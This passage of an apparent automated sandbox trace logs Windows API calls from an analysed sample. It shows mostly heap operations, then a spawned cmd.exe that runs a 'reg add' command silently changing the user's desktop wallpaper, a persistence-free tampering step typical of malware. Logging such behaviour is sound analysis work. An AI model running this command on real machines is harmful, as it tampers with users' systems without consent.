hHeap=0x560000, dwFlags=0x0, lpMem=0x5758a0 | out: hHeap=0x560000) returned 1 [0039.483] GetProcessHeap () returned 0x560000 [0039.483] GetProcessHeap () returned 0x560000 [0039.483] HeapValidate (hHeap=0x560000, dwFlags=0x0, lpMem=0x56f200) returned 1 [0039.483] GetProcessHeap () returned 0x560000 [0039.483] RtlSizeHeap (HeapHandle=0x560000, Flags=0x0, MemoryPointer=0x56f200) returned 0x10 [0039.483] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x56f200 | out: hHeap=0x560000) returned 1 [0039.483] GetProcessHeap () returned 0x560000 [0039.483] GetProcessHeap () returned 0x560000 [0039.483] HeapValidate (hHeap=0x560000, dwFlags=0x0, lpMem=0x574ee0) returned 1 [0039.483] GetProcessHeap () returned 0x560000 [0039.483] RtlSizeHeap (HeapHandle=0x560000, Flags=0x0, MemoryPointer=0x574ee0) returned 0x14 [0039.483] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x574ee0 | out: hHeap=0x560000) returned 1 [0039.483] GetProcessHeap () returned 0x560000 [0039.484] GetProcessHeap () returned 0x560000 [0039.484] HeapValidate (hHeap=0x560000, dwFlags=0x0, lpMem=0x573f20) returned 1 [0039.484] GetProcessHeap () returned 0x560000 [0039.484] RtlSizeHeap (HeapHandle=0x560000, Flags=0x0, MemoryPointer=0x573f20) returned 0x1e [0039.484] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x573f20 | out: hHeap=0x560000) returned 1 [0039.484] GetProcessHeap () returned 0x560000 [0039.484] GetProcessHeap () returned 0x560000 [0039.484] HeapValidate (hHeap=0x560000, dwFlags=0x0, lpMem=0x56f1e8) returned 1 [0039.484] GetProcessHeap () returned 0x560000 [0039.484] RtlSizeHeap (HeapHandle=0x560000, Flags=0x0, MemoryPointer=0x56f1e8) returned 0x10 [0039.484] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x56f1e8 | out: hHeap=0x560000) returned 1 [0039.484] GetProcessHeap () returned 0x560000 [0039.484] GetProcessHeap () returned 0x560000 [0039.484] HeapValidate (hHeap=0x560000, dwFlags=0x0, lpMem=0x574ec0) returned 1 [0039.484] GetProcessHeap () returned 0x560000 [0039.484] RtlSizeHeap (HeapHandle=0x560000, Flags=0x0, MemoryPointer=0x574ec0) returned 0x14 [0039.484] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x574ec0 | out: hHeap=0x560000) returned 1 [0039.484] GetProcessHeap () returned 0x560000 [0039.484] GetProcessHeap () returned 0x560000 [0039.484] HeapValidate (hHeap=0x560000, dwFlags=0x0, lpMem=0x575ae0) returned 1 [0039.484] GetProcessHeap () returned 0x560000 [0039.484] RtlSizeHeap (HeapHandle=0x560000, Flags=0x0, MemoryPointer=0x575ae0) returned 0x50 [0039.484] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x575ae0 | out: hHeap=0x560000) returned 1 [0039.484] GetProcessHeap () returned 0x560000 [0039.484] GetProcessHeap () returned 0x560000 [0039.484] HeapValidate (hHeap=0x560000, dwFlags=0x0, lpMem=0x574da0) returned 1 [0039.484] GetProcessHeap () returned 0x560000 [0039.484] RtlSizeHeap (HeapHandle=0x560000, Flags=0x0, MemoryPointer=0x574da0) returned 0x14 [0039.485] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x574da0 | out: hHeap=0x560000) returned 1 [0039.485] GetProcessHeap () returned 0x560000 [0039.485] GetProcessHeap () returned 0x560000 [0039.485] HeapValidate (hHeap=0x560000, dwFlags=0x0, lpMem=0x574dc0) returned 1 [0039.485] GetProcessHeap () returned 0x560000 [0039.485] RtlSizeHeap (HeapHandle=0x560000, Flags=0x0, MemoryPointer=0x574dc0) returned 0x14 [0039.485] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x574dc0 | out: hHeap=0x560000) returned 1 [0039.485] GetProcessHeap () returned 0x560000 [0039.485] GetProcessHeap () returned 0x560000 [0039.485] HeapValidate (hHeap=0x560000, dwFlags=0x0, lpMem=0x574de0) returned 1 [0039.485] GetProcessHeap () returned 0x560000 [0039.485] RtlSizeHeap (HeapHandle=0x560000, Flags=0x0, MemoryPointer=0x574de0) returned 0x14 [0039.485] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x574de0 | out: hHeap=0x560000) returned 1 [0039.485] GetProcessHeap () returned 0x560000 [0039.485] GetProcessHeap () returned 0x560000 [0039.485] HeapValidate (hHeap=0x560000, dwFlags=0x0, lpMem=0x574e00) returned 1 [0039.485] GetProcessHeap () returned 0x560000 [0039.485] RtlSizeHeap (HeapHandle=0x560000, Flags=0x0, MemoryPointer=0x574e00) returned 0x14 [0039.485] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x574e00 | out: hHeap=0x560000) returned 1 [0039.485] GetProcessHeap () returned 0x560000 [0039.485] GetProcessHeap () returned 0x560000 [0039.485] HeapValidate (hHeap=0x560000, dwFlags=0x0, lpMem=0x56f1a0) returned 1 [0039.485] GetProcessHeap () returned 0x560000 [0039.485] RtlSizeHeap (HeapHandle=0x560000, Flags=0x0, MemoryPointer=0x56f1a0) returned 0x10 [0039.485] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x56f1a0 | out: hHeap=0x560000) returned 1 [0039.485] GetProcessHeap () returned 0x560000 [0039.485] GetProcessHeap () returned 0x560000 [0039.485] HeapValidate (hHeap=0x560000, dwFlags=0x0, lpMem=0x574e20) returned 1 [0039.485] GetProcessHeap () returned 0x560000 [0039.485] RtlSizeHeap (HeapHandle=0x560000, Flags=0x0, MemoryPointer=0x574e20) returned 0x14 [0039.486] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x574e20 | out: hHeap=0x560000) returned 1 [0039.486] GetProcessHeap () returned 0x560000 [0039.486] GetProcessHeap () returned 0x560000 [0039.486] HeapValidate (hHeap=0x560000, dwFlags=0x0, lpMem=0x574e40) returned 1 [0039.486] GetProcessHeap () returned 0x560000 [0039.486] RtlSizeHeap (HeapHandle=0x560000, Flags=0x0, MemoryPointer=0x574e40) returned 0x14 [0039.486] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x574e40 | out: hHeap=0x560000) returned 1 [0039.486] GetProcessHeap () returned 0x560000 [0039.486] GetProcessHeap () returned 0x560000 [0039.486] HeapValidate (hHeap=0x560000, dwFlags=0x0, lpMem=0x574e60) returned 1 [0039.486] GetProcessHeap () returned 0x560000 [0039.486] RtlSizeHeap (HeapHandle=0x560000, Flags=0x0, MemoryPointer=0x574e60) returned 0x14 [0039.486] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x574e60 | out: hHeap=0x560000) returned 1 [0039.486] GetProcessHeap () returned 0x560000 [0039.486] GetProcessHeap () returned 0x560000 [0039.486] HeapValidate (hHeap=0x560000, dwFlags=0x0, lpMem=0x574e80) returned 1 [0039.486] GetProcessHeap () returned 0x560000 [0039.486] RtlSizeHeap (HeapHandle=0x560000, Flags=0x0, MemoryPointer=0x574e80) returned 0x14 [0039.486] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x574e80 | out: hHeap=0x560000) returned 1 [0039.486] GetProcessHeap () returned 0x560000 [0039.486] GetProcessHeap () returned 0x560000 [0039.486] HeapValidate (hHeap=0x560000, dwFlags=0x0, lpMem=0x56f1b8) returned 1 [0039.486] GetProcessHeap () returned 0x560000 [0039.486] RtlSizeHeap (HeapHandle=0x560000, Flags=0x0, MemoryPointer=0x56f1b8) returned 0x10 [0039.486] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x56f1b8 | out: hHeap=0x560000) returned 1 [0039.486] GetProcessHeap () returned 0x560000 [0039.486] GetProcessHeap () returned 0x560000 [0039.486] HeapValidate (hHeap=0x560000, dwFlags=0x0, lpMem=0x574ea0) returned 1 [0039.487] GetProcessHeap () returned 0x560000 [0039.487] RtlSizeHeap (HeapHandle=0x560000, Flags=0x0, MemoryPointer=0x574ea0) returned 0x14 [0039.487] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x574ea0 | out: hHeap=0x560000) returned 1 [0039.487] GetProcessHeap () returned 0x560000 [0039.487] GetProcessHeap () returned 0x560000 [0039.487] HeapValidate (hHeap=0x560000, dwFlags=0x0, lpMem=0x574f00) returned 1 [0039.487] GetProcessHeap () returned 0x560000 [0039.487] RtlSizeHeap (HeapHandle=0x560000, Flags=0x0, MemoryPointer=0x574f00) returned 0x14 [0039.487] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x574f00 | out: hHeap=0x560000) returned 1 [0039.487] GetProcessHeap () returned 0x560000 [0039.487] GetProcessHeap () returned 0x560000 [0039.487] HeapValidate (hHeap=0x560000, dwFlags=0x0, lpMem=0x56f1d0) returned 1 [0039.487] GetProcessHeap () returned 0x560000 [0039.487] RtlSizeHeap (HeapHandle=0x560000, Flags=0x0, MemoryPointer=0x56f1d0) returned 0x10 [0039.487] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x56f1d0 | out: hHeap=0x560000) returned 1 [0039.487] GetProcessHeap () returned 0x560000 [0039.487] GetProcessHeap () returned 0x560000 [0039.487] HeapValidate (hHeap=0x560000, dwFlags=0x0, lpMem=0x574f38) returned 1 [0039.487] GetProcessHeap () returned 0x560000 [0039.487] RtlSizeHeap (HeapHandle=0x560000, Flags=0x0, MemoryPointer=0x574f38) returned 0x14 [0039.487] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x574f38 | out: hHeap=0x560000) returned 1 [0039.487] GetProcessHeap () returned 0x560000 [0039.487] GetProcessHeap () returned 0x560000 [0039.487] HeapValidate (hHeap=0x560000, dwFlags=0x0, lpMem=0x56f188) returned 1 [0039.487] GetProcessHeap () returned 0x560000 [0039.487] RtlSizeHeap (HeapHandle=0x560000, Flags=0x0, MemoryPointer=0x56f188) returned 0x10 [0039.487] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x56f188 | out: hHeap=0x560000) returned 1 [0039.488] exit (_Code=0) Process: id = "7" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x4a49e000" os_pid = "0x67c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x314" cmd_line = "C:\\Windows\\system32\\cmd.exe /c reg add \"HKEY_CURRENT_USER\\Control Panel\\Desktop\" /v Wallpaper /t REG_SZ /d \"%USERPROFILE%\\new_background.bmp\" /f" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 7 os_tid = 0x71c [0039.627] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2cfa8c | out: lpSystemTimeAsFileTime=0x2cfa8c*(dwLowDateTime=0xfe478160, dwHighDateTime=0x1d623ff)) [0039.627] GetCurrentProcessId () returned 0x67c [0039.627] GetCurrentThreadId () returned 0x71c [0039.627] GetTickCount () returned 0x11451e8 [0039.627] QueryPerformanceCounter (in: lpPerformanceCount=0x2cfa84 | out: lpPerformanceCount=0x2cfa84*=15976055631) returned 1 [0039.629] GetModuleHandleA (lpModuleName=0x0) returned 0x4a490000 [0039.629] __set_app_type (_Type=0x1) [0039.629] __p__fmode () returned 0x770331f4 [0039.629] __p__commode () returned 0x770331fc [0039.630] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a4b21a6) returned 0x0 [0039.630] __getmainargs (in: _Argc=0x4a4b4238, _Argv=0x4a4b4240, _Env=0x4a4b423c, _DoWildCard=0, _StartInfo=0x4a4b4140 | out: _Argc=0x4a4b4238, _Argv=0x4a4b4240, _Env=0x4a4b423c) returned 0 [0039.630] GetCurrentThreadId () returned 0x71c [0039.630] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x71c) returned 0x60 [0039.630] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0039.630] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0039.630] SetThreadUILanguage (LangId=0x0) returned 0x409 [0039.631] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0039.631] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2cfa1c | out: phkResult=0x2cfa1c*=0x0) returned 0x2 [0039.631] VirtualQuery (in: lpAddress=0x2cfa53, lpBuffer=0x2cf9ec, dwLength=0x1c | out: lpBuffer=0x2cf9ec*(BaseAddress=0x2cf000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0039.631] VirtualQuery (in: lpAddress=0x1d0000, lpBuffer=0x2cf9ec, dwLength=0x1c | out: lpBuffer=0x2cf9ec*(BaseAddress=0x1d0000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0039.631] VirtualQuery (in: lpAddress=0x1d1000, lpBuffer=0x2cf9ec, dwLength=0x1c | out: lpBuffer=0x2cf9ec*(BaseAddress=0x1d1000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0039.631] VirtualQuery (in: lpAddress=0x1d3000, lpBuffer=0x2cf9ec, dwLength=0x1c | out: lpBuffer=0x2cf9ec*(BaseAddress=0x1d3000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0039.631] VirtualQuery (in: lpAddress=0x2d0000, lpBuffer=0x2cf9ec, dwLength=0x1c | out: lpBuffer=0x2cf9ec*(BaseAddress=0x2d0000, AllocationBase=0x2d0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0039.631] GetConsoleOutputCP () returned 0x1b5 [0039.632] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a4b4260 | out: lpCPInfo=0x4a4b4260) returned 1 [0039.632] SetConsoleCtrlHandler (HandlerRoutine=0x4a4ae72a, Add=1) returned 1 [0039.632] _get_osfhandle (_FileHandle=1) returned 0x7 [0039.632] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0039.632] _get_osfhandle (_FileHandle=1) returned 0x7 [0039.632] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a4b41ac | out: lpMode=0x4a4b41ac) returned 1 [0039.633] _get_osfhandle (_FileHandle=1) returned 0x7 [0039.633] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0039.633] _get_osfhandle (_FileHandle=0) returned 0x3 [0039.633] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a4b41b0 | out: lpMode=0x4a4b41b0) returned 1 [0039.633] GetEnvironmentStringsW () returned 0x722178* [0039.633] GetProcessHeap () returned 0x710000 [0039.634] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0xaca) returned 0x722c50 [0039.634] FreeEnvironmentStringsW (penv=0x722178) returned 1 [0039.634] GetProcessHeap () returned 0x710000 [0039.634] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x4) returned 0x721868 [0039.634] GetEnvironmentStringsW () returned 0x722178* [0039.634] GetProcessHeap () returned 0x710000 [0039.634] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0xaca) returned 0x723728 [0039.634] FreeEnvironmentStringsW (penv=0x722178) returned 1 [0039.634] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ce98c | out: phkResult=0x2ce98c*=0x68) returned 0x0 [0039.635] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ce994, lpData=0x2ce998, lpcbData=0x2ce990*=0x1000 | out: lpType=0x2ce994*=0x0, lpData=0x2ce998*=0x0, lpcbData=0x2ce990*=0x1000) returned 0x2 [0039.635] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ce994, lpData=0x2ce998, lpcbData=0x2ce990*=0x1000 | out: lpType=0x2ce994*=0x4, lpData=0x2ce998*=0x1, lpcbData=0x2ce990*=0x4) returned 0x0 [0039.635] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ce994, lpData=0x2ce998, lpcbData=0x2ce990*=0x1000 | out: lpType=0x2ce994*=0x0, lpData=0x2ce998*=0x1, lpcbData=0x2ce990*=0x1000) returned 0x2 [0039.635] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ce994, lpData=0x2ce998, lpcbData=0x2ce990*=0x1000 | out: lpType=0x2ce994*=0x4, lpData=0x2ce998*=0x0, lpcbData=0x2ce990*=0x4) returned 0x0 [0039.635] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ce994, lpData=0x2ce998, lpcbData=0x2ce990*=0x1000 | out: lpType=0x2ce994*=0x4, lpData=0x2ce998*=0x40, lpcbData=0x2ce990*=0x4) returned 0x0 [0039.635] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ce994, lpData=0x2ce998, lpcbData=0x2ce990*=0x1000 | out: lpType=0x2ce994*=0x4, lpData=0x2ce998*=0x40, lpcbData=0x2ce990*=0x4) returned 0x0 [0039.635] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ce994, lpData=0x2ce998, lpcbData=0x2ce990*=0x1000 | out: lpType=0x2ce994*=0x0, lpData=0x2ce998*=0x40, lpcbData=0x2ce990*=0x1000) returned 0x2 [0039.635] RegCloseKey (hKey=0x68) returned 0x0 [0039.635] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ce98c | out: phkResult=0x2ce98c*=0x68) returned 0x0 [0039.635] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ce994, lpData=0x2ce998, lpcbData=0x2ce990*=0x1000 | out: lpType=0x2ce994*=0x0, lpData=0x2ce998*=0x40, lpcbData=0x2ce990*=0x1000) returned 0x2 [0039.635] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ce994, lpData=0x2ce998, lpcbData=0x2ce990*=0x1000 | out: lpType=0x2ce994*=0x4, lpData=0x2ce998*=0x1, lpcbData=0x2ce990*=0x4) returned 0x0 [0039.635] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ce994, lpData=0x2ce998, lpcbData=0x2ce990*=0x1000 | out: lpType=0x2ce994*=0x0, lpData=0x2ce998*=0x1, lpcbData=0x2ce990*=0x1000) returned 0x2 [0039.636] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ce994, lpData=0x2ce998, lpcbData=0x2ce990*=0x1000 | out: lpType=0x2ce994*=0x4, lpData=0x2ce998*=0x0, lpcbData=0x2ce990*=0x4) returned 0x0 [0039.636] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ce994, lpData=0x2ce998, lpcbData=0x2ce990*=0x1000 | out: lpType=0x2ce994*=0x4, lpData=0x2ce998*=0x9, lpcbData=0x2ce990*=0x4) returned 0x0 [0039.636] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ce994, lpData=0x2ce998, lpcbData=0x2ce990*=0x1000 | out: lpType=0x2ce994*=0x4, lpData=0x2ce998*=0x9, lpcbData=0x2ce990*=0x4) returned 0x0 [0039.636] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ce994, lpData=0x2ce998, lpcbData=0x2ce990*=0x1000 | out: lpType=0x2ce994*=0x0, lpData=0x2ce998*=0x9, lpcbData=0x2ce990*=0x1000) returned 0x2 [0039.636] RegCloseKey (hKey=0x68) returned 0x0 [0039.636] time (in: timer=0x0 | out: timer=0x0) returned 0x5eb34b60 [0039.636] srand (_Seed=0x5eb34b60) [0039.636] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c reg add \"HKEY_CURRENT_USER\\Control Panel\\Desktop\" /v Wallpaper /t REG_SZ /d \"%USERPROFILE%\\new_background.bmp\" /f" [0039.636] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c reg add \"HKEY_CURRENT_USER\\Control Panel\\Desktop\" /v Wallpaper /t REG_SZ /d \"%USERPROFILE%\\new_background.bmp\" /f" [0039.636] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a4b5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0039.636] GetProcessHeap () returned 0x710000 [0039.636] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x210) returned 0x722178 [0039.636] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x722180, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0039.637] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a4c0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0039.637] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a4c0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0039.637] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a4c0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0039.637] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0039.637] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0039.637] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0039.637] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0039.637] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0039.637] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0039.637] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0039.637] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0039.637] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0039.637] GetProcessHeap () returned 0x710000 [0039.637] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x722c50 | out: hHeap=0x710000) returned 1 [0039.637] GetEnvironmentStringsW () returned 0x722390* [0039.637] GetProcessHeap () returned 0x710000 [0039.637] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0xae2) returned 0x724cf0 [0039.638] FreeEnvironmentStringsW (penv=0x722390) returned 1 [0039.638] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a4c0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0039.638] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a4c0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0039.638] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0039.638] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0039.638] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0039.638] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0039.638] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0039.638] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0039.638] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0039.638] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0039.638] GetProcessHeap () returned 0x710000 [0039.638] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0x54) returned 0x7257e0 [0039.638] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2cf758 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0039.638] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x2cf758, lpFilePart=0x2cf754 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x2cf754*="Desktop") returned 0x25 [0039.638] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0039.638] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2cf4d4 | out: lpFindFileData=0x2cf4d4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x721ff8 [0039.639] FindClose (in: hFindFile=0x721ff8 | out: hFindFile=0x721ff8) returned 1 [0039.639] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x2cf4d4 | out: lpFindFileData=0x2cf4d4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xfe3b9a80, ftLastAccessTime.dwHighDateTime=0x1d623ff, ftLastWriteTime.dwLowDateTime=0xfe3b9a80, ftLastWriteTime.dwHighDateTime=0x1d623ff, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x721ff8 [0039.639] FindClose (in: hFindFile=0x721ff8 | out: hFindFile=0x721ff8) returned 1 [0039.639] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0039.639] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x2cf4d4 | out: lpFindFileData=0x2cf4d4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xf5c21be0, ftLastAccessTime.dwHighDateTime=0x1d623ff, ftLastWriteTime.dwLowDateTime=0xf5c21be0, ftLastWriteTime.dwHighDateTime=0x1d623ff, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x721ff8 [0039.639] FindClose (in: hFindFile=0x721ff8 | out: hFindFile=0x721ff8) returned 1 [0039.639] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0039.639] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0039.639] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0039.639] GetProcessHeap () returned 0x710000 [0039.639] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x724cf0 | out: hHeap=0x710000) returned 1 [0039.640] GetEnvironmentStringsW () returned 0x724200* [0039.640] GetProcessHeap () returned 0x710000 [0039.640] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x8, Size=0xb36) returned 0x725840 [0039.640] FreeEnvironmentStringsW (penv=0x724200) returned 1 [0039.640] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a4b5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0039.640] GetProcessHeap () returned 0x710000 [0039.640] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x7257e0 | out: hHeap=0x710000) returned 1 